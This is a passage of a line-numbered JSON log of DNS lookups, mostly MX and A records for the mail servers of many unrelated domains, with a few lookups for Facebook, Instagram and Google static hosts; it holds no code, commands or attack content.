1264 "data": "alt4.aspmx.l.google.com",
1265 "type": "MX"
1266 },
1267 {
1268 "data": "ALT3.aspmx.l.google.com",
1269 "type": "MX"
1270 },
1271 {
1272 "data": "alt2.aspmx.l.google.com",
1273 "type": "MX"
1274 },
1275 {
1276 "data": "alt1.aspmx.l.google.com",
1277 "type": "MX"
1278 },
1279 {
1280 "data": "aspmx.l.google.com",
1281 "type": "MX"
1282 }
1283 ]
1284 },
1285 {
1286 "type": "MX",
1287 "request": "patagonia.com",
1288 "answers": [
1289 {
1290 "data": "patagonia-com.mail.protection.outlook.com",
1291 "type": "MX"
1292 }
1293 ]
1294 },
1295 {
1296 "type": "A",
1297 "request": "patagonia-com.mail.protection.outlook.com",
1298 "answers": [
1299 {
1300 "data": "104.47.38.36",
1301 "type": "A"
1302 },
1303 {
1304 "data": "104.47.36.36",
1305 "type": "A"
1306 }
1307 ]
1308 },
1309 {
1310 "type": "MX",
1311 "request": "andrews.hu",
1312 "answers": [
1313 {
1314 "data": "smtp.andrews.hu",
1315 "type": "MX"
1316 },
1317 {
1318 "data": "mail.andrews.hu",
1319 "type": "MX"
1320 }
1321 ]
1322 },
1323 {
1324 "type": "A",
1325 "request": "mail.andrews.hu",
1326 "answers": [
1327 {
1328 "data": "194.33.69.195",
1329 "type": "A"
1330 }
1331 ]
1332 },
1333 {
1334 "type": "MX",
1335 "request": "mon.bbc.co.uk",
1336 "answers": []
1337 },
1338 {
1339 "type": "MX",
1340 "request": "cofcsem.sdcoxmail.com",
1341 "answers": [
1342 {
1343 "data": "mx.coxmail.com",
1344 "type": "MX"
1345 }
1346 ]
1347 },
1348 {
1349 "type": "A",
1350 "request": "mx.coxmail.com",
1351 "answers": [
1352 {
1353 "data": "52.40.235.249",
1354 "type": "A"
1355 },
1356 {
1357 "data": "52.13.194.227",
1358 "type": "A"
1359 },
1360 {
1361 "data": "52.22.102.143",
1362 "type": "A"
1363 },
1364 {
1365 "data": "34.196.6.209",
1366 "type": "A"
1367 }
1368 ]
1369 },
1370 {
1371 "type": "MX",
1372 "request": "loit.no",
1373 "answers": [
1374 {
1375 "data": "mx03.telecomputing.no",
1376 "type": "MX"
1377 },
1378 {
1379 "data": "mx01.telecomputing.no",
1380 "type": "MX"
1381 }
1382 ]
1383 },
1384 {
1385 "type": "A",
1386 "request": "mx01.telecomputing.no",
1387 "answers": [
1388 {
1389 "data": "95.128.105.101",
1390 "type": "A"
1391 }
1392 ]
1393 },
1394 {
1395 "type": "MX",
1396 "request": "gruposolarix.com",
1397 "answers": [
1398 {
1399 "data": "",
1400 "type": "NXDOMAIN"
1401 }
1402 ]
1403 },
1404 {
1405 "type": "MX",
1406 "request": "suomi24.fi",
1407 "answers": [
1408 {
1409 "data": "mx3.suomi24.heinlein-hosting.de",
1410 "type": "MX"
1411 },
1412 {
1413 "data": "mx5.suomi24.heinlein-hosting.de",
1414 "type": "MX"
1415 },
1416 {
1417 "data": "mx2.suomi24.heinlein-hosting.de",
1418 "type": "MX"
1419 },
1420 {
1421 "data": "mx4.suomi24.heinlein-hosting.de",
1422 "type": "MX"
1423 },
1424 {
1425 "data": "mx1.suomi24.heinlein-hosting.de",
1426 "type": "MX"
1427 }
1428 ]
1429 },
1430 {
1431 "type": "A",
1432 "request": "mx1.suomi24.heinlein-hosting.de",
1433 "answers": [
1434 {
1435 "data": "185.97.172.131",
1436 "type": "A"
1437 }
1438 ]
1439 },
1440 {
1441 "type": "MX",
1442 "request": "gw.medctr.ohio-state.edu",
1443 "answers": [
1444 {
1445 "data": "pfmx01.osumc.edu",
1446 "type": "MX"
1447 }
1448 ]
1449 },
1450 {
1451 "type": "A",
1452 "request": "pfmx01.osumc.edu",
1453 "answers": [
1454 {
1455 "data": "140.254.127.28",
1456 "type": "A"
1457 }
1458 ]
1459 },
1460 {
1461 "type": "MX",
1462 "request": "collyb.co.uk",
1463 "answers": [
1464 {
1465 "data": "mx00.1and1.co.uk",
1466 "type": "MX"
1467 },
1468 {
1469 "data": "mx01.1and1.co.uk",
1470 "type": "MX"
1471 }
1472 ]
1473 },
1474 {
1475 "type": "A",
1476 "request": "mx00.1and1.co.uk",
1477 "answers": [
1478 {
1479 "data": "212.227.15.41",
1480 "type": "A"
1481 }
1482 ]
1483 },
1484 {
1485 "type": "MX",
1486 "request": "oracle.com",
1487 "answers": [
1488 {
1489 "data": "userp2030.oracle.com",
1490 "type": "MX"
1491 },
1492 {
1493 "data": "aserp2020.oracle.com",
1494 "type": "MX"
1495 },
1496 {
1497 "data": "userp2040.oracle.com",
1498 "type": "MX"
1499 },
1500 {
1501 "data": "aserp2030.oracle.com",
1502 "type": "MX"
1503 },
1504 {
1505 "data": "aserp2050.oracle.com",
1506 "type": "MX"
1507 },
1508 {
1509 "data": "userp2020.oracle.com",
1510 "type": "MX"
1511 },
1512 {
1513 "data": "userp2050.oracle.com",
1514 "type": "MX"
1515 },
1516 {
1517 "data": "aserp2040.oracle.com",
1518 "type": "MX"
1519 },
1520 {
1521 "data": "aserp2060.oracle.com",
1522 "type": "MX"
1523 },
1524 {
1525 "data": "userp2060.oracle.com",
1526 "type": "MX"
1527 }
1528 ]
1529 },
1530 {
1531 "type": "A",
1532 "request": "aserp2020.oracle.com",
1533 "answers": [
1534 {
1535 "data": "141.146.126.73",
1536 "type": "A"
1537 }
1538 ]
1539 },
1540 {
1541 "type": "MX",
1542 "request": "stahl-gerlafingen.com",
1543 "answers": [
1544 {
1545 "data": "eu-smtp-inbound-2.mimecast.com",
1546 "type": "MX"
1547 },
1548 {
1549 "data": "mail-in01.vritec.ch",
1550 "type": "MX"
1551 },
1552 {
1553 "data": "eu-smtp-inbound-1.mimecast.com",
1554 "type": "MX"
1555 },
1556 {
1557 "data": "mail-in02.vritec.ch",
1558 "type": "MX"
1559 }
1560 ]
1561 },
1562 {
1563 "type": "A",
1564 "request": "eu-smtp-inbound-1.mimecast.com",
1565 "answers": [
1566 {
1567 "data": "91.220.42.172",
1568 "type": "A"
1569 },
1570 {
1571 "data": "195.130.217.241",
1572 "type": "A"
1573 },
1574 {
1575 "data": "91.220.42.211",
1576 "type": "A"
1577 },
1578 {
1579 "data": "195.130.217.196",
1580 "type": "A"
1581 },
1582 {
1583 "data": "195.130.217.236",
1584 "type": "A"
1585 },
1586 {
1587 "data": "195.130.217.172",
1588 "type": "A"
1589 },
1590 {
1591 "data": "91.220.42.136",
1592 "type": "A"
1593 },
1594 {
1595 "data": "91.220.42.201",
1596 "type": "A"
1597 },
1598 {
1599 "data": "195.130.217.211",
1600 "type": "A"
1601 },
1602 {
1603 "data": "195.130.217.201",
1604 "type": "A"
1605 },
1606 {
1607 "data": "91.220.42.196",
1608 "type": "A"
1609 },
1610 {
1611 "data": "91.220.42.241",
1612 "type": "A"
1613 }
1614 ]
1615 },
1616 {
1617 "type": "MX",
1618 "request": "etecsa.cu",
1619 "answers": [
1620 {
1621 "data": "imx5.etecsa.cu",
1622 "type": "MX"
1623 }
1624 ]
1625 },
1626 {
1627 "type": "A",
1628 "request": "imx5.etecsa.cu",
1629 "answers": [
1630 {
1631 "data": "200.55.152.133",
1632 "type": "A"
1633 }
1634 ]
1635 },
1636 {
1637 "type": "MX",
1638 "request": "crystalgolfresort.com",
1639 "answers": [
1640 {
1641 "data": "barracuda.crystalgolfresort.com",
1642 "type": "MX"
1643 }
1644 ]
1645 },
1646 {
1647 "type": "A",
1648 "request": "barracuda.crystalgolfresort.com",
1649 "answers": [
1650 {
1651 "data": "216.6.138.102",
1652 "type": "A"
1653 }
1654 ]
1655 },
1656 {
1657 "type": "MX",
1658 "request": "monottiputtini.ch",
1659 "answers": [
1660 {
1661 "data": "",
1662 "type": "NXDOMAIN"
1663 }
1664 ]
1665 },
1666 {
1667 "type": "MX",
1668 "request": "rrpac.upr.clu.edu",
1669 "answers": [
1670 {
1671 "data": "",
1672 "type": "NXDOMAIN"
1673 }
1674 ]
1675 },
1676 {
1677 "type": "MX",
1678 "request": "o2.co.uk",
1679 "answers": []
1680 },
1681 {
1682 "type": "MX",
1683 "request": "copelandins.com",
1684 "answers": [
1685 {
1686 "data": "mail.copelandins.com",
1687 "type": "MX"
1688 }
1689 ]
1690 },
1691 {
1692 "type": "A",
1693 "request": "mail.copelandins.com",
1694 "answers": [
1695 {
1696 "data": "192.254.233.158",
1697 "type": "A"
1698 }
1699 ]
1700 },
1701 {
1702 "type": "MX",
1703 "request": "wci.com.ph",
1704 "answers": [
1705 {
1706 "data": "mail.wci.com.ph",
1707 "type": "MX"
1708 }
1709 ]
1710 },
1711 {
1712 "type": "A",
1713 "request": "mail.wci.com.ph",
1714 "answers": [
1715 {
1716 "data": "121.96.53.27",
1717 "type": "A"
1718 }
1719 ]
1720 },
1721 {
1722 "type": "MX",
1723 "request": "dineropractico.net",
1724 "answers": [
1725 {
1726 "data": "mail.dineropractico.net",
1727 "type": "MX"
1728 }
1729 ]
1730 },
1731 {
1732 "type": "A",
1733 "request": "mail.dineropractico.net",
1734 "answers": [
1735 {
1736 "data": "69.64.70.248",
1737 "type": "A"
1738 }
1739 ]
1740 },
1741 {
1742 "type": "MX",
1743 "request": "gmail.com",
1744 "answers": [
1745 {
1746 "data": "alt3.gmail-smtp-in.l.google.com",
1747 "type": "MX"
1748 },
1749 {
1750 "data": "alt2.gmail-smtp-in.l.google.com",
1751 "type": "MX"
1752 },
1753 {
1754 "data": "alt1.gmail-smtp-in.l.google.com",
1755 "type": "MX"
1756 },
1757 {
1758 "data": "alt4.gmail-smtp-in.l.google.com",
1759 "type": "MX"
1760 },
1761 {
1762 "data": "gmail-smtp-in.l.google.com",
1763 "type": "MX"
1764 }
1765 ]
1766 },
1767 {
1768 "type": "MX",
1769 "request": "dune.coastal.udel.edu",
1770 "answers": [
1771 {
1772 "data": "mail.coastal.udel.edu",
1773 "type": "MX"
1774 }
1775 ]
1776 },
1777 {
1778 "type": "A",
1779 "request": "mail.coastal.udel.edu",
1780 "answers": [
1781 {
1782 "data": "128.175.90.5",
1783 "type": "A"
1784 }
1785 ]
1786 },
1787 {
1788 "type": "MX",
1789 "request": "corp.delphiforums.com",
1790 "answers": [
1791 {
1792 "data": "kyc-1.mx20.pef.luxsci.com",
1793 "type": "MX"
1794 },
1795 {
1796 "data": "kyc-1.mx10.pef.luxsci.com",
1797 "type": "MX"
1798 }
1799 ]
1800 },
1801 {
1802 "type": "A",
1803 "request": "kyc-1.mx10.pef.luxsci.com",
1804 "answers": [
1805 {
1806 "data": "148.163.129.50",
1807 "type": "A"
1808 },
1809 {
1810 "data": "67.231.154.162",
1811 "type": "A"
1812 }
1813 ]
1814 },
1815 {
1816 "type": "MX",
1817 "request": "ms2.hinet.net",
1818 "answers": [
1819 {
1820 "data": "msx-smtp-mx2.hinet.net",
1821 "type": "MX"
1822 },
1823 {
1824 "data": "msx-smtp-mx1.hinet.net",
1825 "type": "MX"
1826 }
1827 ]
1828 },
1829 {
1830 "type": "A",
1831 "request": "msx-smtp-mx2.hinet.net",
1832 "answers": [
1833 {
1834 "data": "168.95.5.212",
1835 "type": "A"
1836 },
1837 {
1838 "data": "168.95.5.220",
1839 "type": "A"
1840 },
1841 {
1842 "data": "168.95.5.213",
1843 "type": "A"
1844 },
1845 {
1846 "data": "168.95.5.211",
1847 "type": "A"
1848 },
1849 {
1850 "data": "168.95.5.216",
1851 "type": "A"
1852 },
1853 {
1854 "data": "168.95.5.218",
1855 "type": "A"
1856 },
1857 {
1858 "data": "168.95.5.217",
1859 "type": "A"
1860 },
1861 {
1862 "data": "168.95.5.219",
1863 "type": "A"
1864 },
1865 {
1866 "data": "168.95.5.214",
1867 "type": "A"
1868 },
1869 {
1870 "data": "168.95.5.215",
1871 "type": "A"
1872 }
1873 ]
1874 },
1875 {
1876 "type": "MX",
1877 "request": "yahoo.fr",
1878 "answers": [
1879 {
1880 "data": "mx-eu.mail.am0.yahoodns.net",
1881 "type": "MX"
1882 }
1883 ]
1884 },
1885 {
1886 "type": "A",
1887 "request": "mx-eu.mail.am0.yahoodns.net",
1888 "answers": [
1889 {
1890 "data": "188.125.73.87",
1891 "type": "A"
1892 },
1893 {
1894 "data": "212.82.101.46",
1895 "type": "A"
1896 }
1897 ]
1898 },
1899 {
1900 "type": "MX",
1901 "request": "mail.gmail.com",
1902 "answers": [
1903 {
1904 "data": "",
1905 "type": "NXDOMAIN"
1906 }
1907 ]
1908 },
1909 {
1910 "type": "MX",
1911 "request": "duq2.cc.duq.edu",
1912 "answers": [
1913 {
1914 "data": "",
1915 "type": "NXDOMAIN"
1916 }
1917 ]
1918 },
1919 {
1920 "type": "MX",
1921 "request": "cprautocenter.com",
1922 "answers": [
1923 {
1924 "data": "cprautocenter.com",
1925 "type": "MX"
1926 }
1927 ]
1928 },
1929 {
1930 "type": "A",
1931 "request": "cprautocenter.com",
1932 "answers": [
1933 {
1934 "data": "70.39.151.44",
1935 "type": "A"
1936 }
1937 ]
1938 },
1939 {
1940 "type": "MX",
1941 "request": "wanhai.com",
1942 "answers": [
1943 {
1944 "data": "smtpc.wanhai.com",
1945 "type": "MX"
1946 },
1947 {
1948 "data": "smtpd.wanhai.com",
1949 "type": "MX"
1950 },
1951 {
1952 "data": "smtpa.wanhai.com",
1953 "type": "MX"
1954 }
1955 ]
1956 },
1957 {
1958 "type": "A",
1959 "request": "smtpa.wanhai.com",
1960 "answers": [
1961 {
1962 "data": "210.71.241.187",
1963 "type": "A"
1964 },
1965 {
1966 "data": "61.56.200.187",
1967 "type": "A"
1968 }
1969 ]
1970 },
1971 {
1972 "type": "MX",
1973 "request": "justfood.com.ng",
1974 "answers": [
1975 {
1976 "data": "",
1977 "type": "NXDOMAIN"
1978 }
1979 ]
1980 },
1981 {
1982 "type": "MX",
1983 "request": "adell-trading.cz",
1984 "answers": [
1985 {
1986 "data": "mail.adell-trading.cz",
1987 "type": "MX"
1988 }
1989 ]
1990 },
1991 {
1992 "type": "A",
1993 "request": "mail.adell-trading.cz",
1994 "answers": [
1995 {
1996 "data": "77.92.222.58",
1997 "type": "A"
1998 }
1999 ]
2000 },
2001 {
2002 "type": "MX",
2003 "request": "essex.ac.uk",
2004 "answers": [
2005 {
2006 "data": "isslx098.essex.ac.uk",
2007 "type": "MX"
2008 },
2009 {
2010 "data": "serlx14.essex.ac.uk",
2011 "type": "MX"
2012 },
2013 {
2014 "data": "isslx102.essex.ac.uk",
2015 "type": "MX"
2016 },
2017 {
2018 "data": "serlx29.essex.ac.uk",
2019 "type": "MX"
2020 },
2021 {
2022 "data": "serlx15.essex.ac.uk",
2023 "type": "MX"
2024 }
2025 ]
2026 },
2027 {
2028 "type": "A",
2029 "request": "isslx102.essex.ac.uk",
2030 "answers": [
2031 {
2032 "data": "155.245.47.44",
2033 "type": "A"
2034 }
2035 ]
2036 },
2037 {
2038 "type": "MX",
2039 "request": "duq2.cr.duq.edu",
2040 "answers": [
2041 {
2042 "data": "",
2043 "type": "NXDOMAIN"
2044 }
2045 ]
2046 },
2047 {
2048 "type": "MX",
2049 "request": "creativedrinks.com",
2050 "answers": [
2051 {
2052 "data": "alt1.aspmx.l.google.com",
2053 "type": "MX"
2054 },
2055 {
2056 "data": "aspmx.l.google.com",
2057 "type": "MX"
2058 },
2059 {
2060 "data": "alt4.aspmx.google.com",
2061 "type": "MX"
2062 },
2063 {
2064 "data": "alt4.aspmx.l.google.com",
2065 "type": "MX"
2066 },
2067 {
2068 "data": "alt3.aspmx.l.google.com",
2069 "type": "MX"
2070 },
2071 {
2072 "data": "alt2.aspmx.l.google.com",
2073 "type": "MX"
2074 }
2075 ]
2076 },
2077 {
2078 "type": "MX",
2079 "request": "njit.edu",
2080 "answers": [
2081 {
2082 "data": "ALT4.ASPMX.L.GOOGLE.COM",
2083 "type": "MX"
2084 },
2085 {
2086 "data": "ALT3.ASPMX.L.GOOGLE.COM",
2087 "type": "MX"
2088 },
2089 {
2090 "data": "ASPMX.L.GOOGLE.COM",
2091 "type": "MX"
2092 },
2093 {
2094 "data": "ALT1.ASPMX.L.GOOGLE.COM",
2095 "type": "MX"
2096 },
2097 {
2098 "data": "ALT2.ASPMX.L.GOOGLE.COM",
2099 "type": "MX"
2100 }
2101 ]
2102 },
2103 {
2104 "type": "A",
2105 "request": "ALT1.ASPMX.L.GOOGLE.COM",
2106 "answers": [
2107 {
2108 "data": "209.85.201.27",
2109 "type": "A"
2110 }
2111 ]
2112 },
2113 {
2114 "type": "MX",
2115 "request": "ncbmw.com",
2116 "answers": [
2117 {
2118 "data": "ncbmw-com.mail.protection.outlook.com",
2119 "type": "MX"
2120 }
2121 ]
2122 },
2123 {
2124 "type": "A",
2125 "request": "ncbmw-com.mail.protection.outlook.com",
2126 "answers": [
2127 {
2128 "data": "104.47.37.36",
2129 "type": "A"
2130 },
2131 {
2132 "data": "104.47.36.36",
2133 "type": "A"
2134 }
2135 ]
2136 },
2137 {
2138 "type": "MX",
2139 "request": "fs3.li.umist.ac.uk",
2140 "answers": [
2141 {
2142 "data": "",
2143 "type": "NXDOMAIN"
2144 }
2145 ]
2146 },
2147 {
2148 "type": "MX",
2149 "request": "duq2.int.duq.edu",
2150 "answers": [
2151 {
2152 "data": "",
2153 "type": "NXDOMAIN"
2154 }
2155 ]
2156 },
2157 {
2158 "type": "MX",
2159 "request": "dag.sg",
2160 "answers": [
2161 {
2162 "data": "",
2163 "type": "NXDOMAIN"
2164 }
2165 ]
2166 },
2167 {
2168 "type": "MX",
2169 "request": "ug.edu.gh",
2170 "answers": [
2171 {
2172 "data": "ug-edu-gh.mail.protection.outlook.com",
2173 "type": "MX"
2174 }
2175 ]
2176 },
2177 {
2178 "type": "A",
2179 "request": "ug-edu-gh.mail.protection.outlook.com",
2180 "answers": [
2181 {
2182 "data": "104.47.8.36",
2183 "type": "A"
2184 },
2185 {
2186 "data": "104.47.10.36",
2187 "type": "A"
2188 }
2189 ]
2190 },
2191 {
2192 "type": "MX",
2193 "request": "hollister.com",
2194 "answers": [
2195 {
2196 "data": "cluster6a.us.messagelabs.com",
2197 "type": "MX"
2198 },
2199 {
2200 "data": "cluster6.us.messagelabs.com",
2201 "type": "MX"
2202 }
2203 ]
2204 },
2205 {
2206 "type": "A",
2207 "request": "cluster6.us.messagelabs.com",
2208 "answers": [
2209 {
2210 "data": "67.219.246.100",
2211 "type": "A"
2212 },
2213 {
2214 "data": "67.219.250.196",
2215 "type": "A"
2216 },
2217 {
2218 "data": "67.219.250.100",
2219 "type": "A"
2220 },
2221 {
2222 "data": "67.219.246.196",
2223 "type": "A"
2224 },
2225 {
2226 "data": "67.219.251.52",
2227 "type": "A"
2228 },
2229 {
2230 "data": "67.219.247.52",
2231 "type": "A"
2232 }
2233 ]
2234 },
2235 {
2236 "type": "MX",
2237 "request": "kolson.biz",
2238 "answers": [
2239 {
2240 "data": "mail.kolson.biz",
2241 "type": "MX"
2242 }
2243 ]
2244 },
2245 {
2246 "type": "A",
2247 "request": "mail.kolson.biz",
2248 "answers": [
2249 {
2250 "data": "192.185.136.184",
2251 "type": "A"
2252 }
2253 ]
2254 },
2255 {
2256 "type": "MX",
2257 "request": "thamesvalley.police.uk",
2258 "answers": []
2259 },
2260 {
2261 "type": "MX",
2262 "request": "salud.unm.edu",
2263 "answers": [
2264 {
2265 "data": "smtp.health.unm.edu",
2266 "type": "MX"
2267 }
2268 ]
2269 },
2270 {
2271 "type": "A",
2272 "request": "smtp.health.unm.edu",
2273 "answers": [
2274 {
2275 "data": "206.192.191.15",
2276 "type": "A"
2277 }
2278 ]
2279 },
2280 {
2281 "type": "MX",
2282 "request": "dave-lloyd.com",
2283 "answers": [
2284 {
2285 "data": "dave-lloyd.com",
2286 "type": "MX"
2287 }
2288 ]
2289 },
2290 {
2291 "type": "A",
2292 "request": "dave-lloyd.com",
2293 "answers": [
2294 {
2295 "data": "67.225.137.90",
2296 "type": "A"
2297 }
2298 ]
2299 },
2300 {
2301 "type": "MX",
2302 "request": "crystalgraphics.com",
2303 "answers": [
2304 {
2305 "data": "mail.crystalgraphics.com",
2306 "type": "MX"
2307 }
2308 ]
2309 },
2310 {
2311 "type": "A",
2312 "request": "mail.crystalgraphics.com",
2313 "answers": [
2314 {
2315 "data": "65.111.178.5",
2316 "type": "A"
2317 }
2318 ]
2319 },
2320 {
2321 "type": "MX",
2322 "request": "hope-street.org",
2323 "answers": []
2324 },
2325 {
2326 "type": "MX",
2327 "request": "rsstec.com",
2328 "answers": [
2329 {
2330 "data": "rsstec.com",
2331 "type": "MX"
2332 }
2333 ]
2334 },
2335 {
2336 "type": "A",
2337 "request": "rsstec.com",
2338 "answers": [
2339 {
2340 "data": "67.205.103.71",
2341 "type": "A"
2342 }
2343 ]
2344 },
2345 {
2346 "type": "MX",
2347 "request": "colstate.edu",
2348 "answers": [
2349 {
2350 "data": "",
2351 "type": "NXDOMAIN"
2352 }
2353 ]
2354 },
2355 {
2356 "type": "MX",
2357 "request": "dave9000.com",
2358 "answers": [
2359 {
2360 "data": "",
2361 "type": "NXDOMAIN"
2362 }
2363 ]
2364 },
2365 {
2366 "type": "MX",
2367 "request": "crossfittecnica.com",
2368 "answers": [
2369 {
2370 "data": "",
2371 "type": "NXDOMAIN"
2372 }
2373 ]
2374 },
2375 {
2376 "type": "MX",
2377 "request": "howardcenter.org",
2378 "answers": [
2379 {
2380 "data": "d12916b.ess.barracudanetworks.com",
2381 "type": "MX"
2382 },
2383 {
2384 "data": "d12916a.ess.barracudanetworks.com",
2385 "type": "MX"
2386 }
2387 ]
2388 },
2389 {
2390 "type": "A",
2391 "request": "d12916a.ess.barracudanetworks.com",
2392 "answers": [
2393 {
2394 "data": "209.222.82.126",
2395 "type": "A"
2396 },
2397 {
2398 "data": "209.222.82.138",
2399 "type": "A"
2400 },
2401 {
2402 "data": "209.222.82.141",
2403 "type": "A"
2404 },
2405 {
2406 "data": "209.222.82.135",
2407 "type": "A"
2408 },
2409 {
2410 "data": "209.222.82.156",
2411 "type": "A"
2412 },
2413 {
2414 "data": "209.222.82.147",
2415 "type": "A"
2416 },
2417 {
2418 "data": "209.222.82.153",
2419 "type": "A"
2420 },
2421 {
2422 "data": "209.222.82.150",
2423 "type": "A"
2424 },
2425 {
2426 "data": "209.222.82.162",
2427 "type": "A"
2428 },
2429 {
2430 "data": "209.222.82.165",
2431 "type": "A"
2432 },
2433 {
2434 "data": "209.222.82.132",
2435 "type": "A"
2436 },
2437 {
2438 "data": "209.222.82.144",
2439 "type": "A"
2440 },
2441 {
2442 "data": "209.222.82.159",
2443 "type": "A"
2444 },
2445 {
2446 "data": "209.222.82.129",
2447 "type": "A"
2448 }
2449 ]
2450 },
2451 {
2452 "type": "MX",
2453 "request": "organizeconsult.com.br",
2454 "answers": [
2455 {
2456 "data": "mail.organizeconsult.com.br",
2457 "type": "MX"
2458 }
2459 ]
2460 },
2461 {
2462 "type": "A",
2463 "request": "mail.organizeconsult.com.br",
2464 "answers": [
2465 {
2466 "data": "192.185.211.97",
2467 "type": "A"
2468 }
2469 ]
2470 },
2471 {
2472 "type": "MX",
2473 "request": "daveberliner.com",
2474 "answers": [
2475 {
2476 "data": "daveberliner.com",
2477 "type": "MX"
2478 }
2479 ]
2480 },
2481 {
2482 "type": "A",
2483 "request": "daveberliner.com",
2484 "answers": [
2485 {
2486 "data": "209.59.174.147",
2487 "type": "A"
2488 }
2489 ]
2490 },
2491 {
2492 "type": "MX",
2493 "request": "crossfittroy.com",
2494 "answers": [
2495 {
2496 "data": "smtp.crossfittroy.com",
2497 "type": "MX"
2498 }
2499 ]
2500 },
2501 {
2502 "type": "A",
2503 "request": "smtp.crossfittroy.com",
2504 "answers": [
2505 {
2506 "data": "65.49.39.13",
2507 "type": "A"
2508 }
2509 ]
2510 },
2511 {
2512 "type": "MX",
2513 "request": "letrahora.com",
2514 "answers": [
2515 {
2516 "data": "mail.letrahora.com",
2517 "type": "MX"
2518 }
2519 ]
2520 },
2521 {
2522 "type": "A",
2523 "request": "mail.letrahora.com",
2524 "answers": [
2525 {
2526 "data": "5.2.88.89",
2527 "type": "A"
2528 }
2529 ]
2530 },
2531 {
2532 "type": "MX",
2533 "request": "dallasmavs.com",
2534 "answers": [
2535 {
2536 "data": "mta3.dallasmavs.com",
2537 "type": "MX"
2538 }
2539 ]
2540 },
2541 {
2542 "type": "A",
2543 "request": "mta3.dallasmavs.com",
2544 "answers": [
2545 {
2546 "data": "12.215.42.102",
2547 "type": "A"
2548 }
2549 ]
2550 },
2551 {
2552 "type": "MX",
2553 "request": "ascksa.com",
2554 "answers": [
2555 {
2556 "data": "aspmx2.googlemail.com",
2557 "type": "MX"
2558 },
2559 {
2560 "data": "alt2.aspmx.l.google.com",
2561 "type": "MX"
2562 },
2563 {
2564 "data": "alt1.aspmx.l.google.com",
2565 "type": "MX"
2566 },
2567 {
2568 "data": "aspmx3.googlemail.com",
2569 "type": "MX"
2570 },
2571 {
2572 "data": "aspmx.l.google.com",
2573 "type": "MX"
2574 }
2575 ]
2576 },
2577 {
2578 "type": "MX",
2579 "request": "davecowton.co.uk",
2580 "answers": [
2581 {
2582 "data": "mailserver.davecowton.co.uk",
2583 "type": "MX"
2584 }
2585 ]
2586 },
2587 {
2588 "type": "A",
2589 "request": "mailserver.davecowton.co.uk",
2590 "answers": [
2591 {
2592 "data": "213.171.216.40",
2593 "type": "A"
2594 }
2595 ]
2596 },
2597 {
2598 "type": "MX",
2599 "request": "crossflooring.com",
2600 "answers": [
2601 {
2602 "data": "mx.spamexperts.com",
2603 "type": "MX"
2604 }
2605 ]
2606 },
2607 {
2608 "type": "A",
2609 "request": "www.instagram.com",
2610 "answers": [
2611 {
2612 "data": "z-p42-instagram.c10r.facebook.com",
2613 "type": "CNAME"
2614 },
2615 {
2616 "data": "31.13.80.174",
2617 "type": "A"
2618 }
2619 ]
2620 },
2621 {
2622 "type": "A",
2623 "request": "mx.spamexperts.com",
2624 "answers": [
2625 {
2626 "data": "188.138.56.29",
2627 "type": "A"
2628 },
2629 {
2630 "data": "149.13.73.48",
2631 "type": "A"
2632 },
2633 {
2634 "data": "31.204.155.105",
2635 "type": "A"
2636 },
2637 {
2638 "data": "149.13.73.55",
2639 "type": "A"
2640 },
2641 {
2642 "data": "38.89.254.82",
2643 "type": "A"
2644 },
2645 {
2646 "data": "154.61.81.57",
2647 "type": "A"
2648 },
2649 {
2650 "data": "149.13.73.58",
2651 "type": "A"
2652 },
2653 {
2654 "data": "149.5.95.71",
2655 "type": "A"
2656 },
2657 {
2658 "data": "154.61.81.53",
2659 "type": "A"
2660 },
2661 {
2662 "data": "38.89.254.79",
2663 "type": "A"
2664 },
2665 {
2666 "data": "85.25.237.91",
2667 "type": "A"
2668 },
2669 {
2670 "data": "149.13.73.45",
2671 "type": "A"
2672 },
2673 {
2674 "data": "212.32.243.83",
2675 "type": "A"
2676 },
2677 {
2678 "data": "31.204.154.238",
2679 "type": "A"
2680 },
2681 {
2682 "data": "31.204.154.237",
2683 "type": "A"
2684 },
2685 {
2686 "data": "217.118.19.158",
2687 "type": "A"
2688 },
2689 {
2690 "data": "212.32.233.198",
2691 "type": "A"
2692 },
2693 {
2694 "data": "38.89.254.80",
2695 "type": "A"
2696 },
2697 {
2698 "data": "149.13.73.46",
2699 "type": "A"
2700 },
2701 {
2702 "data": "149.13.73.57",
2703 "type": "A"
2704 },
2705 {
2706 "data": "31.204.154.236",
2707 "type": "A"
2708 },
2709 {
2710 "data": "149.5.95.73",
2711 "type": "A"
2712 },
2713 {
2714 "data": "149.13.73.47",
2715 "type": "A"
2716 },
2717 {
2718 "data": "149.13.73.56",
2719 "type": "A"
2720 },
2721 {
2722 "data": "31.204.154.86",
2723 "type": "A"
2724 }
2725 ]
2726 },
2727 {
2728 "type": "MX",
2729 "request": "istitutotumori.mi.it",
2730 "answers": [
2731 {
2732 "data": "in.hes.trendmicro.eu",
2733 "type": "MX"
2734 }
2735 ]
2736 },
2737 {
2738 "type": "A",
2739 "request": "in.hes.trendmicro.eu",
2740 "answers": [
2741 {
2742 "data": "52.58.62.238",
2743 "type": "A"
2744 },
2745 {
2746 "data": "52.58.62.239",
2747 "type": "A"
2748 }
2749 ]
2750 },
2751 {
2752 "type": "MX",
2753 "request": "forschner.cz",
2754 "answers": [
2755 {
2756 "data": "mx2.uh.cz",
2757 "type": "MX"
2758 },
2759 {
2760 "data": "fw.forschner.cz",
2761 "type": "MX"
2762 },
2763 {
2764 "data": "mx1.uh.cz",
2765 "type": "MX"
2766 },
2767 {
2768 "data": "ms.forschner.cz",
2769 "type": "MX"
2770 },
2771 {
2772 "data": "forschner-cz.mail.eo.outlook.com",
2773 "type": "MX"
2774 }
2775 ]
2776 },
2777 {
2778 "type": "A",
2779 "request": "mx1.uh.cz",
2780 "answers": [
2781 {
2782 "data": "80.251.255.3",
2783 "type": "A"
2784 }
2785 ]
2786 },
2787 {
2788 "type": "A",
2789 "request": "www.gstatic.com",
2790 "answers": [
2791 {
2792 "data": "172.217.1.3",
2793 "type": "A"
2794 }
2795 ]
2796 },
2797 {
2798 "type": "A",
2799 "request": "facebook.com",
2800 "answers": [
2801 {
2802 "data": "31.13.80.36",
2803 "type": "A"
2804 }
2805 ]
2806 },
2807 {
2808 "type": "A",
2809 "request": "www.facebook.com",
2810 "answers": [
2811 {
2812 "data": "31.13.80.36",
2813 "type": "A"
2814 },
2815 {
2816 "data": "star-mini.c10r.facebook.com",
2817 "type": "CNAME"
2818 }
2819 ]
2820 },
2821 {
2822 "type": "MX",
2823 "request": "yahoo.co.in",
2824 "answers": [
2825 {
2826 "data": "mx-apac.mail.gm0.yahoodns.net",
2827 "type": "MX"
2828 }
2829 ]
2830 },
2831 {
2832 "type": "A",
2833 "request": "mx-apac.mail.gm0.yahoodns.net",
2834 "answers": [
2835 {
